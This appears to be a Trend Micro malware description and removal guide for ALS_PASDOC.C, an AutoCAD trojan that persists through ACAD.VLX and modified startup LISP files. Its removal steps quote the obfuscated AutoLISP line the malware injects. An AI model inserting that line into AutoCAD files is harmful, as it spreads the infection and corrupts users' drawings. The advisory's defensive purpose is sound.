Analysis by: Erika Bianca Mendoza
 PLATFORM:

Windows 2000, Windows XP, Windows Server 2003

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: Yes

  • In the wild: Yes

  OVERVIEW

Canal de infecção: Infects files

This is the Trend Micro detection for malicious ACAD.VLX file which is loaded once the AutoCAD software starts. This malware may cause the drawings to be corrupted.

This Trojan may be dropped by other malware. It may be unknowingly downloaded by a user while visiting malicious websites.

It does not have any propagation routine.

It does not have any downloading capability.

It does not have any information-stealing capability.

  TECHNICAL DETAILS

Tipo de compactação: 4,096 bytes
Tipo de arquivo: Other
Residente na memória: Yes
Data de recebimento das amostras iniciais: 28 Sep 2011

Arrival Details

This Trojan may be dropped by other malware.

It may be unknowingly downloaded by a user while visiting malicious websites.

Propagation

This Trojan does not have any propagation routine.

Download Routine

This Trojan does not have any downloading capability.

Information Theft

This Trojan does not have any information-stealing capability.

NOTES:

Rootkit Capabilities

This malware does not have rootkit capabilities.

Other Details

This is the Trend Micro detection for malicious ACAD.VLX file which is loaded once the AutoCAD software starts. This malware may create the following malicious file:

  • {AutoCAD path}\Help\logo.gif

Infection is done by appending the contents of LOGO.GIF to ACAD.VLX.

It also sets the value of the variable ACADLSPASDOC to 1 so that ACAD.VLX is loaded each time a drawing is opened.

It may also modify the following files to contain malicious code:

  • acad.mnl
  • ai_utils.lsp
  • acetauto.lsp

The added code appends the contents of LOGO.GIF to ACAD.VLX. This malware may cause the drawings to be corrupted.

This malware does not exploit any vulnerability.

  SOLUTION

Mecanismo de varredura mínima: 9.200
Primeiro arquivo padrão VSAPI: 8.460.05
Data do lançamento do primeiro padrão VSAPI: 28 Sep 2011
VSAPI OPR Pattern Version: 8.461.00
VSAPI OPR Pattern veröffentlicht am: 29 Sep 2011

Step 1

For Windows XP and Windows Server 2003 users, before doing any scans, please make sure you disable System Restore to allow full scanning of your computer.

Step 2

Search and delete this file

[ Learn More ]
There may be some component files that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the More advanced options option to include all hidden files and folders in the search result.
  • {AutoCAD path}\Help\logo.gif

Step 3

Scan your computer with your Trend Micro product to delete files detected as ALS_PASDOC.C. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check this Knowledge Base page for more information.

NOTES:

Restoring the Modified Files

  1. Right-click Start then click Search... or Find..., depending on the version of Windows you are running.
    In the Named input box, type:

    acad.mnl
    ai_utils.lsp
    acetauto.lsp
  2. In the Look In drop-down list, select My Computer, then press Enter.
  3. Once located, open the found files in notepad and delete the following line of code, if present:

    (vl-file-copy(findfile(vl-list->string'(108 111 103 111 46 103 105 102)))(vl-list->string'(97 99 97 100 46 118 108 120)))


Did this description help? Tell us how we did.